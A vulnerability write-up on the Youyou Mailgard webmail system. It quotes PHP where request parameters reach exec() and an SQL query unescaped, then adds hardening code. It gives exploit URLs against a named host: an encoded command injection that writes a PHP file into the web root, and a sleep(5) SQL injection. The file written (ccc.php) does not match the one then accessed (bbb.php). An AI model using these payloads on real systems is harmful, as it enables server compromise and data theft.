Youyou Mailgard webmail system: SQL injection and command execution (login required)

Command execution in show_mail.php (the "sd" parameter is double-decoded, split on ":" and passed unescaped to exec()):

require_once('../global.php');
// GET the parameter information
$t_get_sd = urldecode($_GET['sd']);
$_GET['sd'] = strlen($_GET['sd']) > strlen($t_get_sd) ? $t_get_sd : $_GET['sd'];
list($box_name, $uid) = explode(':', $_GET['sd']);
$box_name = ($box_name);
$get_sd = urlencode($box_name) . ":" . $uid;
if (strpos($_COOKIE['my_referer'], 'box_list.php?sd=hicommail_search') !== false) {
    if (strpos($_COOKIE['my_referer'], '&labelMail=1') !== false) {
        $label  = 'star';
        $label2 = 'star2';
    } else {
        $label  = 'search';
        $label2 = 'search2';
    }
}
if ($_GET['delMove']) {
    // move, delete and star actions clear the search/star id session records;
    // to prevent that, keep a copy of the SESSION entry that is used only on the show_mail.php page
    if ($_SESSION['h_MAILS'][$label]['box:uid']) {
        $_SESSION['h_MAILS'][$label2]['box:uid'] = $_SESSION['h_MAILS'][$label]['box:uid'];
    }
    if (($_GET['delMove'] == 'delete' && $box_name == 'trash') || $_GET['delMove'] == 'shiftDelete') {
        select_mailbox($connection, $box_name);
        $deleted = mail_flags($connection, '\\Deleted', '+', $uid);
    } else {
        if ($_GET['delMove'] == 'delete' && $box_name != 'trash') {
            $toBox = 'trash';
        } elseif ($_GET['delMove'] == 'move') {
            $toBox = $_GET['toBoxName'];
        }
        if ($gDoveadm == '0') {
            $toBox = mb_convert_encoding($toBox, 'utf-8', 'utf7-imap');
            $boxnm = mb_convert_encoding($box_name, 'utf-8', 'utf7-imap');
            // $toBox, $boxnm and $uid all come from the request and reach the shell without escaping
            exec("sudo /usr/bin/doveadm move -u " . $gMyAccounts . " '" . $toBox . "' mailbox '" . $boxnm . "' uid " . $uid);
            // ... (excerpt ends here)
        }
    }
}
Log in with any user account, then send this URL:
http://mail.iconergy.com:889/src/show_mail.php?sd=aaaa%253A%2520%2526%2520echo%2520%2527%253C%253Fphp%2520phpinfo%2528%2529%253F%253E%2527%2520%253E%2520%252fvar%252fwww%252fnewmail%252fccc.php&delMove=move&toBoxName=yyy
Then access:
http://mail.iconergy.com:889/bbb.php
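The root cause is that the mailbox name and uid taken from "sd" are concatenated into the doveadm command without validation or escaping. The following is an added hardening example written for this write-up; it is not code from the Mailgard project. It shows how show_mail.php could validate both halves of "sd" before building the command; the function names parse_sd, validate_box_name, validate_uid and build_move_command, and the integration point at the bottom, are assumptions.

```php
<?php
// Added hardening example (not Mailgard code). Function names are assumptions.

// Mailbox names: accept only the characters a folder name is expected to contain.
function validate_box_name(string $box): string {
    // Letters, digits, dot, underscore, hyphen and slash; anything else (space, &, ;, quotes) is rejected.
    if ($box === '' || !preg_match('/^[A-Za-z0-9._\/-]{1,64}$/', $box)) {
        throw new InvalidArgumentException('invalid mailbox name');
    }
    return $box;
}

// IMAP UIDs are positive integers; a uid carrying shell metacharacters never passes this check.
function validate_uid(string $uid): int {
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $uid)) {
        throw new InvalidArgumentException('invalid uid');
    }
    return (int) $uid;
}

// Parse "box:uid" exactly once. PHP has already URL-decoded $_GET, so no second
// urldecode() pass is performed (the original code's double decoding is what let
// %25-encoded payloads through).
function parse_sd(string $sd): array {
    $parts = explode(':', $sd, 2);
    if (count($parts) !== 2) {
        throw new InvalidArgumentException('malformed sd parameter');
    }
    return [validate_box_name($parts[0]), validate_uid($parts[1])];
}

// Build the doveadm command with every string argument passed through escapeshellarg().
// After validation the folder names are ASCII, so no UTF-7 conversion is needed here.
function build_move_command(string $account, string $fromBox, string $toBox, int $uid): string {
    $fromBox = validate_box_name($fromBox);
    $toBox   = validate_box_name($toBox);
    return 'sudo /usr/bin/doveadm move -u ' . escapeshellarg($account)
         . ' ' . escapeshellarg($toBox)
         . ' mailbox ' . escapeshellarg($fromBox)
         . ' uid ' . $uid;
}

// Assumed integration point inside show_mail.php:
// [$box_name, $uid] = parse_sd($_GET['sd'] ?? '');
// $cmd = build_move_command($gMyAccounts, $box_name, $_GET['toBoxName'] ?? '', $uid);
// exec($cmd);
```

Validation rejects the injected input before it is ever concatenated, and escapeshellarg() covers whatever the whitelist still allows; relying on either alone is weaker than doing both. If the product needs non-ASCII folder names, the whitelist has to be widened and the UTF-7 conversion kept, but the escaping step still applies to the converted string.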
SQL injection in write_mail.php:

require_once('../global.php');
$filetime = time();
$defAllUFSize = $defAllUFId = 0;
$defImgsVal = $defFilesVal = '';
$defUFSUnit = $defAllUFSize . 'B';
$dir = HM_ROOT . $gSubTmpUploadDir;
if (!is_dir($dir)) {
    @mkdir($dir, 0722, true); // layer-by-layer check, creating with 0700 permissions
}
if ($_GET['manId']) {
    $to = getLinkmanByManid($_GET['manId']);
Following the call into getLinkmanByManid:

/**
 * Write email
 */
function getLinkmanByManid($manId) {
    global $db, $gMyAccounts;
    // $manId is concatenated straight into the IN (...) clause without any filtering
    $linkSql = "SELECT * FROM `linkman` WHERE `man_id` IN ($manId) ORDER BY `sort`";
    $linkResult = $db->query($linkSql);
    while ($linkRs = $db->fetch_array($linkResult)) {
        $rs[] = $linkRs['name'] ? '"' . $linkRs['name'] . '" <' . $linkRs['mail_addr'] . '>' : $linkRs['mail_addr'];
    }
    if ($rs) {
        $rs = implode('; ', $rs);
    } else {
        $rs = '';
    }
    return $rs;
}
A direct request:
http://mail.iconergy.com:889/src/write_mail.php?manId=sleep(5)

This produces a delay in the response. Constructing further SQL statements from here is not covered in this write-up.
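Since manId is only ever meant to be a list of numeric contact ids, the fix is to validate each id and bind the values as query parameters instead of splicing them into the SQL text. The following is an added example written for this write-up, not code from the Mailgard project; it assumes a PDO connection and the linkman table columns (man_id, name, mail_addr, sort) seen in the original query, and the function name getLinkmanByManidSafe is an assumption.

```php
<?php
// Added hardening example (not Mailgard code). Assumes a PDO connection; the
// original $db wrapper with query()/fetch_array() is replaced by PDO here.

function getLinkmanByManidSafe(PDO $db, string $manIdList): string {
    // Split the comma-separated list and accept only strictly numeric ids.
    // Payloads such as "sleep(5)" or "1) OR 1=1" fail ctype_digit() and are rejected.
    $ids = [];
    foreach (explode(',', $manIdList) as $raw) {
        $raw = trim($raw);
        if ($raw === '' || !ctype_digit($raw)) {
            throw new InvalidArgumentException('invalid manId value: ' . $raw);
        }
        $ids[] = (int) $raw;
    }
    if ($ids === []) {
        return '';
    }

    // One positional placeholder per id; the SQL text never contains user input.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT `name`, `mail_addr` FROM `linkman` WHERE `man_id` IN ($placeholders) ORDER BY `sort`";
    $stmt = $db->prepare($sql);
    $stmt->execute($ids);

    // Same output format as the original function: "Name" <addr>; addr; ...
    $rs = [];
    while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
        $rs[] = !empty($row['name'])
            ? '"' . $row['name'] . '" <' . $row['mail_addr'] . '>'
            : $row['mail_addr'];
    }
    return implode('; ', $rs);
}

// Assumed integration point inside write_mail.php:
// if (isset($_GET['manId'])) {
//     $to = getLinkmanByManidSafe($db, $_GET['manId']);
// }
```

The placeholder list is built from count($ids), so the number of bound parameters always matches the number of "?" markers, and the integer cast means the driver sends plain numbers; a time-based payload like sleep(5) no longer reaches the database at all.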
Fix: strengthen input filtering on the "sd", "toBoxName" and "manId" parameters before they reach exec() or the SQL query.